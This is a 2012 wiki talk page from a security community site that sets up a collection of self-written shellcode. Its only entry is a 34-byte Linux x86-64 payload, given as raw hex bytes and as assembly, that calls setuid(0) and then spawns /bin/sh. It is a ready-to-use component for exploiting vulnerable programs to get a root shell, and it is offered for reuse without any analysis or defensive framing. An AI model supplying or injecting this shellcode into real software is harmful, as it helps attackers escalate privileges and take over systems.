Questions about this topic? Sign up to ask in the talk tab.

Category talk:Shellcode

From NetSec
Revision as of 03:27, 19 August 2012 by LashawnSeccombe (Talk | contribs) (Linux)

Jump to: navigation, search

Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! Hatter 05:23, 19 August 2012 (MSK)

Collections

c3el4.png This page needs shellcodes, and will be updated with it shortly.

Thanks for your patience.

Windows

Linux

64-bit

setuid(0); execve('/bin/sh'); - 34 bytes

Hatter 05:27, 19 August 2012 (MSK)

  • \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
 
.section .data
.section .text
.globl _start
_start:
 mov $0, %rdi
 mov $105, %rax
 syscall
 
# a function is f(%rdi,%rdx,%rsi)
 mov $59, %rax
                # execve(filename, argv, envp)
 push $0x00
 mov %rsp, %rdx # argv is null
 mov %rsp, %rsi # envp is null
 mov $0x0068732f6e69622f, %rcx
 push %rcx
 mov %rsp, %rdi # filename is '/bin/sh\0'
 syscall
 
 mov $60, %rax
 mov $0, %rdi
 syscall
Retrieved from "http://nets.ec/index.php?title=Category_talk:Shellcode&oldid=8819"